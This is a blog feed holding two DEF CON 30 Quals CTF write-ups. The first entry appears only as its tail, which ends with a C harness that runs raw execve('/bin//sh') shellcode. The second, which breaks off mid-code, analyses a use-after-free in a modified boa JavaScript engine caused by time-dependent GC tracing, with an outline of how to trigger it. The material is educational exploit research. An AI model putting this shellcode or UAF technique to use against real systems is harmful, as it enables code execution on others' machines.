alt="image-20220830202913401"></p><p>So I wrote a small program by hand to try to reproduce it:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="type">char</span>* path = <span class="string">&quot;/bin//sh&quot;</span>;</span><br><span class="line">    <span class="type">char</span>* argv[] = &#123; path, <span class="literal">NULL</span> &#125;;</span><br><span class="line">    execve(path, argv, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">abort</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>But the problem did not reproduce:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830203612583.png" alt="image-20220830203612583"></p><p>Even executing the shellcode directly:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="type">char</span>* shellcode = <span class="string">&quot;\x48\x31\xf6\x48\x89\xf2\x48\x89\xf1\x56\x68\x2f\x62&quot;</span></span><br><span class="line">                  <span class="string">&quot;\x69\x6e\x59\x68\x2f\x2f\x73\x68\x5f\x48\xc1\xe7\x20\x48&quot;</span></span><br><span class="line">                  <span class="string">&quot;\x09\xcf\x57\x48\x89\xe7\x6a\x3b\x58\x99\x6a\x00\x57\x48\x89\xe6\x0f\x05&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="comment">// char* path = &quot;/bin//sh&quot;;</span></span><br><span class="line">    <span class="comment">// char* argv[] = &#123; path, NULL &#125;;</span></span><br><span class="line">    <span class="comment">// execve(path, argv, NULL);</span></span><br><span class="line">    </span><br><span class="line">    <span class="type">char</span> buffer[<span class="number">50</span>];</span><br><span class="line">    <span class="built_in">memcpy</span>(buffer, shellcode, <span class="number">50</span>);</span><br><span class="line">    <span class="type">void</span> (*scfunc)() = buffer;</span><br><span class="line">    scfunc();</span><br><span 
class="line">    <span class="built_in">abort</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>still fails to reproduce the case where <code>/bin/sh</code> exits immediately:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830204619529.png" alt="image-20220830204619529"></p><p>I was completely stumped. So I used gdb's <code>catch exec</code> command to follow execution into the exec'd dash process and debug from there, and finally discovered that the cause was that <strong>stdin had been closed</strong> (facepalm), which leaves the shell with nothing to read commands from:</p><p><img src="/2022/08/defcon30quals_smugglers_cove/image-20220830214854162.png" alt="image-20220830214854162"></p><p>Looking back, the cove source made this clear all along; I had simply overlooked it:</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> <span class="title function_">run_code</span><span class="params">(lua_State* L, <span class="type">char</span>* path)</span> &#123;</span><br><span class="line">    <span class="type">const</span> <span class="type">size_t</span> max_size = MAX_SIZE;</span><br><span class="line">    <span class="type">char</span>* code = <span class="built_in">calloc</span>(max_size+<span class="number">1</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    FILE* f = fopen(path,<span class="string">&quot;r&quot;</span>);</span><br><span class="line">    ...</span><br><span class="line">    fseek(f, <span 
class="number">0</span>, SEEK_END);</span><br><span class="line">    <span class="type">size_t</span> size = ftell(f);</span><br><span class="line">    ...</span><br><span class="line">    fseek(f, <span class="number">0</span>, SEEK_SET);</span><br><span class="line">    fread(code, <span class="number">1</span>, size, f);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Here! stdin gets closed</span></span><br><span class="line">    fclose(<span class="built_in">stdin</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">int</span> ret = luaL_dostring(L, code);</span><br><span class="line">    <span class="keyword">if</span> (ret != <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="built_in">printf</span>(<span class="string">&quot;Lua error: %s\n&quot;</span>, lua_tostring(L, <span class="number">-1</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Oh well. All I can say is that I was not observant enough and walked straight into this pit.</p><p>That wraps up the post-mortem for this challenge!</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my post-mortem notes on &lt;code&gt;smuggler&#39;s cove&lt;/code&gt; from Defcon 30 Quals.&lt;/p&gt;
&lt;p&gt;The challenge is a luaJIT pwn task.&lt;/p&gt;</summary>
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>Defcon-30-Quals rust-pwn constricted: Post-Mortem Notes</title>
    <link href="https://kiprey.github.io/2022/08/defcon30quals_constricted/"/>
    <id>https://kiprey.github.io/2022/08/defcon30quals_constricted/</id>
    <published>2022-08-26T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.972Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my post-mortem notes on <code>constricted</code> from Defcon 30 Quals.</p><p>The challenge supplies a git diff against the <code>boa</code> project and asks you to exploit boa after the diff is applied. boa is a <strong>javascript engine written in rust</strong>, so pwning it means writing a JS exploit script.</p><p>When I first attempted this challenge I had never touched rust; this time, <s>having returned from my studies</s>, I can take a proper look at it.</p><p>The point of the challenge is to show that <strong>even programs written in rust can still contain vulnerabilities</strong>.</p><span id="more"></span><blockquote><p>Note that debugging was done on a real machine, <strong>not in the docker environment</strong>, so the exp may not be portable.</p></blockquote><h2 id="二、diff-内容">II. The diff</h2><p>The diff can be summarized roughly as follows:</p><ol><li><p>At startup the program mmaps a block of memory of random size. The ctor attribute here means that this init function must run before main:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">use</span> libc::&#123;getrandom, mmap, MAP_PRIVATE, MAP_ANON&#125;;</span><br><span class="line"><span class="keyword">use</span> std::ptr;</span><br><span class="line"><span class="keyword">use</span> ctor::*;</span><br><span class="line"></span><br><span class="line"><span class="meta">#[ctor]</span></span><br><span class="line"><span class="keyword">unsafe</span> <span class="keyword">fn</span> <span class="title function_">init</span>() &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">buf</span> = [<span class="number">0u8</span>; <span class="number">4</span>];</span><br><span class="line">    <span class="title function_ invoke__">getrandom</span>(buf.<span class="title function_ invoke__">as_mut_ptr</span>() <span 
class="keyword">as</span> *<span class="keyword">mut</span> libc::c_void, <span class="number">4</span>, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">off</span> = std::mem::transmute::&lt;[<span class="type">u8</span>; <span class="number">4</span>], <span class="type">u32</span>&gt;(buf).<span class="title function_ invoke__">to_le</span>() <span class="keyword">as</span> <span class="type">usize</span>;</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">off</span> = off &lt;&lt; <span class="number">12</span>;</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">length</span> = <span class="number">0x80000000</span> + off;</span><br><span class="line">    <span class="title function_ invoke__">mmap</span>(ptr::<span class="title function_ invoke__">null_mut</span>(), length, <span class="number">0</span>, MAP_PRIVATE | MAP_ANON, -<span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>A new JSObject, <code>TimedCache</code>, is introduced:</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt; <span class="keyword">let</span> v = <span class="keyword">new</span> <span class="title class_">TimedCache</span>()</span><br><span class="line"><span class="literal">undefined</span></span><br><span class="line">&gt;&gt; v</span><br><span class="line"><span class="title class_">TimedCache</span>()</span><br></pre></td></tr></table></figure><p>The TimedCache class lives in <code>boa_engine/src/builtins/timed_cache/mod.rs</code> and has three methods: <code>get</code>, <code>set</code> and <code>has</code>. All three are time-related and <strong>behave much like a timer</strong>: you can use set to install a timer, get 
to fetch the remaining time of a given timer, and has to check whether a timer has expired.</p></li><li><p>Several extra methods are implemented on the console class:</p><ol><li><p><code>console.sysbreak()</code>: calling it triggers an int3 interrupt.</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt; <span class="variable language_">console</span>.<span class="title function_">sysbreak</span>()</span><br><span class="line">[<span class="number">1</span>]    <span class="number">155238</span> trace <span class="title function_">trap</span> (core dumped)  target/debug/boa</span><br></pre></td></tr></table></figure></li><li><p><code>console.sleep(ms)</code>: suspends the thread for a while, in milliseconds.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&gt;&gt; console.<span class="built_in">sleep</span>(<span class="number">1000</span>) <span class="comment">// sleep 1s</span></span><br><span class="line">undefined</span><br></pre></td></tr></table></figure></li><li><p><code>console.collectGarbage()</code>: forces a garbage collection. The collector triggered here is the one in the <code>gc = &quot;0.4.1&quot;</code> crate, i.e. <a href="https://github.com/Manishearth/rust-gc">rust-gc</a>.</p></li><li><p>The <code>console.debug</code> method is enhanced to print more useful information.</p></li></ol></li><li><p>In the <code>boa_engine/src/object/internal_methods/</code> folder, more than half of the classes are modified so that <strong>every static internal method object of a modified class</strong> is <strong>allocated on the heap instead of in the data segment</strong>.</p></li></ol><h2 id="三、漏洞定位">III. Locating the Vulnerability</h2><p>From the summary above we can see that the diff:</p><ol><li><p>provides time-related methods and classes such as <code>console.sleep</code> and <code>TimedCache</code>.</p></li><li><p>goes out of its way to move static objects <strong>onto the heap</strong> (they were perfectly fine in the data segment, yet they were deliberately moved).</p></li><li><p>deliberately exposes <code>console.collectGarbage</code>, an interface that forces rust-gc to run a collection.</p></li></ol><p>So this challenge is clearly a fight against rust-gc. One might ask: doesn't rust do without a gc? It does, but managing memory with Arc and Rc alone can lead to nasty situations such as reference cycles, and it also makes development harder. The rust-gc crate exists to balance memory-management safety against development efficiency.</p><p>rust-gc 
is a <code>mark-sweep</code> GC: only marked objects are kept, and unmarked objects are destroyed during collection. Details are at <a href="https://github.com/Manishearth/rust-gc">rust-gc - github</a>; be sure to read it first to get a rough idea of how rust-gc is used.</p><p>When summarizing the diff I left out the implementation details of the TimedCache class, and that is exactly where the key lies. In <code>boa_engine/src/builtins/timed_cache/mod.rs</code>, the <code>TimeCachedValue</code> type uses <code>boa_gc</code> (a wrapper around rust-gc) to manage its instances:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#[derive(Debug, Clone)]</span></span><br><span class="line"><span class="keyword">pub</span> <span class="keyword">struct</span> <span class="title class_">TimeCachedValue</span> &#123;</span><br><span class="line">    expire: <span class="type">u128</span>,</span><br><span class="line">    data: JsObject,</span><br><span class="line">&#125;</span><br><span class="line">...</span><br><span class="line"><span class="keyword">impl</span> <span class="title class_">Finalize</span> <span class="keyword">for</span> <span class="title class_">TimeCachedValue</span> &#123;&#125;</span><br><span class="line"><span class="keyword">unsafe</span> <span class="keyword">impl</span> <span class="title class_">Trace</span> <span class="keyword">for</span> <span class="title class_">TimeCachedValue</span> &#123;</span><br><span class="line">    custom_trace!(this, &#123;</span><br><span class="line">        <span class="keyword">if</span> !this.<span class="title function_ invoke__">is_expired</span>() &#123;</span><br><span class="line">    
        <span class="title function_ invoke__">mark</span>(&amp;this.data);</span><br><span class="line">        &#125; </span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If the <strong>timer stored</strong> in a <code>TimeCachedValue</code> <strong>has expired</strong>, the <strong>data in that TimeCachedValue instance is no longer marked</strong>, which means that at some point after expiry the memory occupied by data will be freed. Note that the type of the data field, <code>JsObject</code>, is itself a <code>GC</code> type:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">pub</span> <span class="keyword">struct</span> <span class="title class_">JsObject</span> &#123;</span><br><span class="line">    inner: Gc&lt;boa_gc::Cell&lt;Object&gt;&gt;,</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Note, however, that <code>Gc&lt;_&gt;</code> is merely a pointer type to a <code>Gc::Cell</code>. In other words, even though the Cell that <code>Gc&lt;_&gt;</code> points to has been freed, the <code>Gc&lt;_&gt;</code> itself still sits inside the <code>TimeCachedValue</code>. If we can sneak the <code>Gc&lt;_&gt;</code> pointer out after the <code>Gc::Cell</code> has been freed, we get a UAF.</p><p>In the whole TimedCache implementation only one place looks suspicious, and that is the get function:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span 
class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">JsValue</span>::<span class="title function_ invoke__">Object</span>(<span class="keyword">ref</span> object) = this &#123;</span><br><span class="line">    <span class="comment">// 1. check expire</span></span><br><span class="line">    <span class="keyword">if</span> !<span class="title function_ invoke__">check_is_not_expired</span>(object, key, context)? &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_ invoke__">Ok</span>(JsValue::<span class="title function_ invoke__">undefined</span>());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">let</span> <span class="variable">new_lifetime</span> = args.<span class="title function_ invoke__">get_or_undefined</span>(<span class="number">1</span>);</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">expire</span> = <span class="keyword">if</span> !new_lifetime.<span class="title function_ invoke__">is_undefined</span>() &amp;&amp; !new_lifetime.<span class="title function_ invoke__">is_null</span>() &#123;</span><br><span class="line">        <span class="comment">// 2. calc new expire. 
Is it possible to collect `data`?</span></span><br><span class="line">        <span class="title function_ invoke__">Some</span>(<span class="title function_ invoke__">calculate_expire</span>(new_lifetime, context)?)</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="literal">None</span></span><br><span class="line">    &#125;;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">Some</span>(cache) = object.<span class="title function_ invoke__">borrow_mut</span>().<span class="title function_ invoke__">as_timed_cache_mut</span>() &#123;</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">Some</span>(cached_val) = cache.<span class="title function_ invoke__">get_mut</span>(key) &#123;</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">Some</span>(expire) = expire &#123;</span><br><span class="line">                cached_val.expire = expire <span class="keyword">as</span> <span class="type">u128</span>;</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="comment">// 3. 
Maybe return freed reference of `data`</span></span><br><span class="line">            <span class="keyword">return</span> <span class="title function_ invoke__">Ok</span>(JsValue::<span class="title function_ invoke__">Object</span>(cached_val.data.<span class="title function_ invoke__">clone</span>()));</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_ invoke__">Ok</span>(JsValue::<span class="title function_ invoke__">undefined</span>());</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Inside <code>calculate_expire</code>, the <code>to_integer_or_infinity</code> method is called on the lifetime argument:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">fn</span> <span class="title function_">calculate_expire</span>(lifetime: &amp;JsValue, context: &amp;<span class="keyword">mut</span> Context) <span class="punctuation">-&gt;</span> JsResult&lt;<span class="type">i128</span>&gt; &#123;</span><br><span class="line">    <span class="keyword">let</span> <span class="variable">lifetime</span> = lifetime.<span class="title function_ invoke__">to_integer_or_infinity</span>(context)?;</span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If the lifetime passed in is a carefully crafted object, then when boa calls <code>calculate_expire</code> it runs the hook function of that lifetime object, and inside that hook we can sleep and then trigger a gc. As a result, <code>TimedCache::get</code> can end up returning a gc reference that has already been freed, which triggers the UAF.</p><p>From there, exploitation can proceed via heap spray + UAF.</p><h2 id="四、浅析-rust-gc">4. A Brief Look at rust-gc</h2><p>While working on the challenge I also studied the rust-gc library to see whether a multi-thread race was possible. Debugging showed that the whole boa process <strong>has only a single main thread</strong>. boa triggers a mark &amp; sweep GC on its own only after the total size of the created objects exceeds a threshold, and the initial per-thread value of that threshold is 100 
bytes:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// /root/.cargo/registry/src/mirrors.tuna.tsinghua.edu.cn-df7c3c540f42cdbd/gc-0.4.1/src/gc.rs</span></span><br><span class="line"><span class="keyword">impl</span>&lt;T: Trace&gt; GcBox&lt;T&gt; &#123;</span><br><span class="line">    <span class="comment">/// Allocates a garbage collected `GcBox` on the heap,</span></span><br><span class="line">    <span class="comment">/// and appends it to the thread-local `GcBox` chain.</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// A `GcBox` allocated this way starts its life rooted.</span></span><br><span class="line">    <span class="title function_ invoke__">pub</span>(<span class="keyword">crate</span>) <span class="keyword">fn</span> <span class="title function_">new</span>(value: T) <span class="punctuation">-&gt;</span> NonNull&lt;<span class="keyword">Self</span>&gt; &#123;</span><br><span class="line">        GC_STATE.<span class="title function_ invoke__">with</span>(|st| &#123;</span><br><span class="line">            <span class="keyword">let</span> <span class="keyword">mut </span><span class="variable">st</span> = st.<span class="title function_ invoke__">borrow_mut</span>();</span><br><span class="line"></span><br><span class="line">            <span 
class="comment">// XXX We should probably be more clever about collecting</span></span><br><span class="line">            <span class="keyword">if</span> st.bytes_allocated &gt; st.threshold &#123;</span><br><span class="line">                <span class="comment">// HERE! </span></span><br><span class="line">                <span class="title function_ invoke__">collect_garbage</span>(&amp;<span class="keyword">mut</span> *st);</span><br><span class="line">                ...</span><br><span class="line">            &#125;</span><br><span class="line">            ...</span><br></pre></td></tr></table></figure><blockquote><p>The rust-gc library is not long; spending some time understanding its implementation helps enormously with this challenge.</p></blockquote><p>Every GC object has a GC header that records some extra attributes of the object, such as the <code>marked</code> flag and <code>next</code>, a reference to the next object on the GC chain:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> <span class="variable">gcbox</span> = <span class="type">Box</span>::<span class="title function_ invoke__">into_raw</span>(<span class="type">Box</span>::<span class="title function_ invoke__">new</span>(GcBox &#123;</span><br><span class="line">    header: GcBoxHeader &#123;</span><br><span class="line">        roots: Cell::<span class="title function_ invoke__">new</span>(<span class="number">1</span>),</span><br><span class="line">        marked: Cell::<span class="title function_ invoke__">new</span>(<span class="literal">false</span>),</span><br><span class="line">        next: st.boxes_start.<span class="title function_ invoke__">take</span>(),</span><br><span class="line">    &#125;,</span><br><span class="line">    data: value,</span><br><span 
class="line">&#125;));</span><br></pre></td></tr></table></figure><p>When the application calls <code>Gc::new</code> to create a heap object, that function actually creates the object through the <code>GcBox</code> shown above:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">impl</span>&lt;T: Trace&gt; Gc&lt;T&gt; &#123;</span><br><span class="line">    <span class="comment">/// Constructs a new `Gc&lt;T&gt;` with the given value.</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// # Collection</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// This method could trigger a garbage collection.</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// # 
Examples</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// </span></span><br><span class="line">    <span class="comment">/// use gc::Gc;</span></span><br><span class="line">    <span class="comment">///</span></span><br><span class="line">    <span class="comment">/// let five = Gc::new(5);</span></span><br><span class="line">    <span class="comment">/// assert_eq!(*five, 5);</span></span><br><span class="line">    <span class="comment">/// </span></span><br><span class="line">    <span class="keyword">pub</span> <span class="keyword">fn</span> <span class="title function_">new</span>(value: T) <span class="punctuation">-&gt;</span> <span class="keyword">Self</span> &#123;</span><br><span class="line">        <span class="built_in">assert!</span>(mem::align_of::&lt;GcBox&lt;T&gt;&gt;() &gt; <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">unsafe</span> &#123;</span><br><span class="line">            <span class="comment">// Allocate the memory for the object</span></span><br><span class="line">            <span class="keyword">let</span> <span class="variable">ptr</span> = GcBox::<span class="title function_ invoke__">new</span>(value);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// When we create a Gc&lt;T&gt;, all pointers which have been moved to the</span></span><br><span class="line">            <span class="comment">// heap no longer need to be rooted, so we unroot them.</span></span><br><span class="line">            (*ptr.<span class="title function_ invoke__">as_ptr</span>()).<span class="title function_ invoke__">value</span>().<span class="title function_ invoke__">unroot</span>();</span><br><span class="line">            <span class="keyword">let</span> <span class="variable">gc</span> = Gc &#123;</span><br><span class="line">                ptr_root: 
Cell::<span class="title function_ invoke__">new</span>(NonNull::<span class="title function_ invoke__">new_unchecked</span>(ptr.<span class="title function_ invoke__">as_ptr</span>())),</span><br><span class="line">                marker: PhantomData,</span><br><span class="line">            &#125;;</span><br><span class="line">            gc.<span class="title function_ invoke__">set_root</span>();</span><br><span class="line">            gc</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The <code>Gc&lt;_&gt;</code> struct only holds a pointer to a <code>GcBox&lt;_&gt;</code>, and only the allocation and freeing of <code>GcBox&lt;_&gt;</code> are actually managed by the mark&amp;sweep GC.</p><p>When a GC is triggered and the mark phase begins, the GC walks the <code>GcBox&lt;_&gt;</code> chain it maintains, marks the rooted boxes one by one, and recursively marks the <strong>child fields</strong> of each struct. Every GcBox has a <code>roots</code> field in its header that tells the GC whether the box is a root, that is, a starting point for marking. If a GcBox is a child field of another GcBox, then <strong>the <code>roots</code> value of that child GcBox is 0</strong>. What the GC reclaims is exactly the GcBoxes that are <strong>neither roots nor marked</strong>.</p><p>A GcBox created through <code>Gc::new</code> and then stored inside another GC object does not stay rooted; the gc can still reach it by starting from the topmost gc holders in boa and recursively tracing downward to mark each <code>GcBox&lt;_&gt;</code>. The whole process is self-consistent. The reason this challenge has a vulnerability is that <strong>boa's <code>custom_trace</code> implementation for TimeCachedValue is wrong</strong>:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsafe</span> <span class="keyword">impl</span> <span class="title class_">Trace</span> <span class="keyword">for</span> <span class="title class_">TimeCachedValue</span> &#123;</span><br><span class="line">    custom_trace!(this, &#123;</span><br><span class="line">        <span class="comment">// 
externally mutable condition</span></span><br><span class="line">        <span class="keyword">if</span> !this.<span class="title function_ invoke__">is_expired</span>() &#123;</span><br><span class="line">            <span class="title function_ invoke__">mark</span>(&amp;this.data);</span><br><span class="line">        &#125; </span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Introducing a check on an <strong>externally mutable condition</strong> into trace leads to a situation where <strong>the Gc variable as a whole is still on the object tree, yet the data inside the GC has already been freed</strong>.</p><blockquote><p>The externally mutable condition here is <strong>time</strong>.</p><p>In other words, this trace implementation violates a rule: <strong>a variable must not be freed while its ownership has not changed in any way</strong>.</p></blockquote><p>Below is an example of using custom_trace correctly:</p><figure class="highlight rust"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unsafe</span> <span class="keyword">impl</span>&lt;V: Trace, S: BuildHasher&gt; Trace <span class="keyword">for</span> <span class="title class_">OrderedMap</span>&lt;V, S&gt; &#123;</span><br><span class="line">    custom_trace!(this, &#123;</span><br><span class="line">        <span class="keyword">for</span> (k, v) <span class="keyword">in</span> this.map.<span class="title function_ invoke__">iter</span>() &#123;</span><br><span class="line">            <span class="keyword">if</span> <span class="keyword">let</span> <span class="variable">MapKey</span>::<span class="title function_ invoke__">Key</span>(key) = k &#123;</span><br><span class="line">                <span class="title function_ invoke__">mark</span>(key);</span><br><span class="line">            &#125;</span><br><span class="line">            <span 
